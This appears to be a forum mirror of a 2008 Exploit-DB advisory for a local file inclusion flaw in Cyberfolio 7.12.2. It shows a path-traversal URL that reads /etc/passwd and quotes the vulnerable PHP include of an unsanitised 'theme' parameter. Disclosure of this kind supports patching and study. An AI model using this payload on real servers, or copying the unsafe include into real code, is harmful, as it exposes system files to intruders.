- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7065
- Проверка EDB
-
- Пройдено
- Автор
- DUN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6265
- Дата публикации
- 2008-11-08
Код:
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
##################################################################
# [ Cyberfolio <= 7.12.2 ] Local File Inclusion Vulnerability #
##################################################################
#
# Script site: http://cyberfolio.org/
# Download: http://cyberfolio.org/Version-7-12-2
#
# Vuln: http://site.com/cyberfolio_7_12.2/portfolio/css.php?theme=../../../../../../etc/passwd%00
#
# Bug: ./cyberfolio_7_12.2/portfolio/css.php (lines: 30-33)
#
# ...
# if (file_exists("./themes/".$_GET[theme].".php")) {
# include_once("./themes/".$_GET[theme].".php"); // LFI
# }
# ...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
# milw0rm.com [2008-11-08]
- Источник
- www.exploit-db.com